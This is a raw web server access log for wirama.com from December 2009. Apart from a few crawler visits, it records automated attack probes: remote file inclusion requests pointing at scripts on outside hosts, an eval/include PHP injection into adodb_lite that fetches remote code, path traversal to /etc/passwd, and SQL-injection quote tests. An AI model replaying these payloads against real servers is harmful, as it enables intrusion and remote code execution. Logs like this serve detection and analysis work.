125.251.214.26 - - [02/Dec/2009:09:14:56 -0800] "GET ////?path=http://n34.biz/id1.txt? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [02/Dec/2009:09:14:56 -0800] "GET /logs/////?path=http://n34.biz/id1.txt? HTTP/1.1" 200 3520 "-" "Mozilla/5.0" "wirama.com"
65.55.207.45 - - [02/Dec/2009:09:14:58 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
193.0.88.1 - - [02/Dec/2009:09:15:06 -0800] "GET /logs//vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.0.88.1 - - [02/Dec/2009:09:15:06 -0800] "GET /logs/access_090330.log%20%20//vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.0.88.1 - - [02/Dec/2009:09:15:23 -0800] "GET /logs/access_090801.log%20%20//vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [02/Dec/2009:09:15:46 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [02/Dec/2009:09:15:46 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [02/Dec/2009:09:15:46 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [02/Dec/2009:09:18:18 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [02/Dec/2009:09:18:18 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [02/Dec/2009:09:18:18 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [02/Dec/2009:09:18:37 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [02/Dec/2009:09:19:04 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [02/Dec/2009:09:24:48 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [02/Dec/2009:09:28:11 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
83.209.46.197 - - [02/Dec/2009:09:31:12 -0800] "GET /phphtml.php?htmlclass_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
83.209.46.197 - - [02/Dec/2009:09:31:12 -0800] "GET /phphtml.php?htmlclass_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
193.0.88.1 - - [02/Dec/2009:09:31:17 -0800] "GET /logs/access_090731.log//vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.0.88.1 - - [02/Dec/2009:09:31:17 -0800] "GET /logs/access_090801.log//vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.0.88.1 - - [02/Dec/2009:09:31:17 -0800] "GET /logs//vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.0.88.1 - - [02/Dec/2009:09:31:17 -0800] "GET /vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Dec/2009:09:34:16 -0800] "GET /?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Dec/2009:09:34:16 -0800] "GET /logs/access_091031.log//?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Dec/2009:09:34:16 -0800] "GET /logs//?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 3517 "-" "Mozilla/5.0" "wirama.com"
193.0.88.1 - - [02/Dec/2009:09:35:00 -0800] "GET /logs/access_090330.log//vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.0.88.1 - - [02/Dec/2009:09:35:56 -0800] "GET /logs/access_090801.log//vwar/backup/errors.php?error=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [02/Dec/2009:09:36:38 -0800] "GET /logs/access_090901.log//?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.77.188.157 - - [02/Dec/2009:09:39:11 -0800] "GET /logs/access_090801.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://standardcan.com/test/cms/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
69.77.188.157 - - [02/Dec/2009:09:39:11 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://standardcan.com/test/cms/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
69.77.188.157 - - [02/Dec/2009:09:39:11 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://standardcan.com/test/cms/media/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
213.171.225.234 - - [02/Dec/2009:09:41:37 -0800] "GET /?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Dec/2009:09:41:37 -0800] "GET /logs//?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 3517 "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Dec/2009:09:41:37 -0800] "GET /logs/access_091031.log//?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [02/Dec/2009:09:44:23 -0800] "GET /logs/access_090901.log//?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [02/Dec/2009:09:48:36 -0800] "GET /skin/happycast_category_lightblack/setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [02/Dec/2009:09:48:36 -0800] "GET /logs/skin/happycast_category_lightblack/setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [02/Dec/2009:09:48:36 -0800] "GET /logs/access.log/skin/happycast_category_lightblack/setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:50:17 -0800] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:50:17 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:50:17 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:50:29 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:50:29 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:50:29 -0800] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:51:52 -0800] "GET /logs/access_090501.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:51:55 -0800] "GET /logs/access_090501.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:53:15 -0800] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:53:15 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:53:15 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:53:23 -0800] "GET /logs/access_090801.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:53:24 -0800] "GET /logs/access_090801.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:53:31 -0800] "GET /logs/access_090501.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:53:43 -0800] "GET /logs/access_090501.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.251.214.26 - - [02/Dec/2009:09:54:30 -0800] "GET /logs//skin/happycast/write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [02/Dec/2009:09:54:30 -0800] "GET /logs/access.log//skin/happycast/write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [02/Dec/2009:09:54:30 -0800] "GET /skin/happycast/write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [02/Dec/2009:09:54:30 -0800] "GET /logs/access_091031.log//skin/happycast/write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.0.88.1 - - [02/Dec/2009:09:55:59 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.0.88.1 - - [02/Dec/2009:09:55:59 -0800] "GET /logs/access_090801.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.0.88.1 - - [02/Dec/2009:09:55:59 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.230.158 - - [02/Dec/2009:09:56:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0" "wirama.com"
65.55.230.158 - - [02/Dec/2009:09:56:37 -0800] "GET /?S=D HTTP/1.1" 200 916 "-" "Mozilla/4.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:56:50 -0800] "GET /logs/access_091101.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:57:02 -0800] "GET /logs/access_091101.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.0.88.1 - - [02/Dec/2009:09:58:00 -0800] "GET /logs/access_090801.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [02/Dec/2009:09:58:20 -0800] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:58:20 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:58:20 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:58:20 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [02/Dec/2009:09:58:37 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.112.174 - - [02/Dec/2009:09:59:06 -0800] "GET /logs/errors.php?error=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.112.174 - - [02/Dec/2009:09:59:06 -0800] "GET /errors.php?error=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.112.174 - - [02/Dec/2009:09:59:18 -0800] "GET /logs/access_090501.log/errors.php?error=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.27 - - [02/Dec/2009:10:01:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
193.0.88.1 - - [02/Dec/2009:10:01:04 -0800] "GET /logs/access_090801.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.0.88.1 - - [02/Dec/2009:10:01:04 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.0.88.1 - - [02/Dec/2009:10:01:04 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.0.88.1 - - [02/Dec/2009:10:01:04 -0800] "GET /logs/access_090601.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.125.107.130 - - [02/Dec/2009:10:07:51 -0800] "GET /index.php?DOCUMENT_ROOT=http://lstic.tw/ls/modules/tinycontent//admin/spaw/tbk1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.125.107.130 - - [02/Dec/2009:10:07:51 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://lstic.tw/ls/modules/tinycontent//admin/spaw/tbk1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.125.107.130 - - [02/Dec/2009:10:07:51 -0800] "GET /logs/access_090501.log//index.php?DOCUMENT_ROOT=http://lstic.tw/ls/modules/tinycontent//admin/spaw/tbk1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.251.214.26 - - [02/Dec/2009:10:08:24 -0800] "GET /skin/happycast_category_darkblack//setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [02/Dec/2009:10:08:24 -0800] "GET /logs/skin/happycast_category_darkblack//setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [02/Dec/2009:10:08:24 -0800] "GET /logs/access.log/skin/happycast_category_darkblack//setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.27 - - [02/Dec/2009:10:09:58 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
93.184.79.59 - - [02/Dec/2009:10:15:40 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
93.184.79.59 - - [02/Dec/2009:10:15:40 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
125.160.17.200 - - [02/Dec/2009:10:20:24 -0800] "GET /index.php?maincat_id=' HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.wirama.com"
125.160.17.200 - - [02/Dec/2009:10:25:29 -0800] "GET /logs/access_090801.log/index.php?maincat_id=' HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.wirama.com"
125.160.17.200 - - [02/Dec/2009:10:25:29 -0800] "GET /index.php?maincat_id=' HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.wirama.com"
125.160.17.200 - - [02/Dec/2009:10:25:30 -0800] "GET /logs/index.php?maincat_id=' HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.wirama.com"
94.23.50.32 - - [02/Dec/2009:10:31:42 -0800] "GET /index.php?option=com_joaktree&view=joaktree&treeId= HTTP/1.1" 404 - "-" "-" "wirama.com"
94.23.50.32 - - [02/Dec/2009:10:31:42 -0800] "GET /logs/index.php?option=com_joaktree&view=joaktree&treeId= HTTP/1.1" 404 - "-" "-" "wirama.com"
125.251.214.26 - - [02/Dec/2009:10:41:45 -0800] "GET /logs/access.log//setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [02/Dec/2009:10:41:45 -0800] "GET /setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.251.214.26 - - [02/Dec/2009:10:41:45 -0800] "GET /logs//setup.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.58.139.68 - - [02/Dec/2009:10:42:16 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:10:42:16 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:10:42:16 -0800] "GET /logs/access_090329.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.249.85.65 - - [02/Dec/2009:10:43:43 -0800] "GET / HTTP/1.1" 200 916 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; feed-id=11572357192736681981)" "www.wirama.com"
213.136.32.137 - - [02/Dec/2009:10:43:53 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
213.136.32.137 - - [02/Dec/2009:10:43:53 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
74.54.223.100 - - [02/Dec/2009:10:46:11 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [02/Dec/2009:10:46:11 -0800] "GET /logs/access_090801.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [02/Dec/2009:10:46:12 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [02/Dec/2009:10:46:24 -0800] "GET /logs/access_091031.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [02/Dec/2009:10:46:38 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.54.223.100 - - [02/Dec/2009:10:46:38 -0800] "GET /logs/access_090801.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.54.223.100 - - [02/Dec/2009:10:46:39 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.115.43.161 - - [02/Dec/2009:10:47:13 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.115.43.161 - - [02/Dec/2009:10:47:13 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.115.43.161 - - [02/Dec/2009:10:47:14 -0800] "GET /logs/access_090801.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [02/Dec/2009:10:48:09 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.54.223.100 - - [02/Dec/2009:10:48:09 -0800] "GET /logs/access_090801.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.54.223.100 - - [02/Dec/2009:10:48:09 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.54.223.100 - - [02/Dec/2009:10:48:13 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.54.223.100 - - [02/Dec/2009:10:48:13 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.54.223.100 - - [02/Dec/2009:10:48:14 -0800] "GET /logs/access_090801.log%20%20/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.115.43.161 - - [02/Dec/2009:10:48:21 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [02/Dec/2009:10:48:53 -0800] "GET /logs/access_090801.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.54.223.100 - - [02/Dec/2009:10:48:53 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
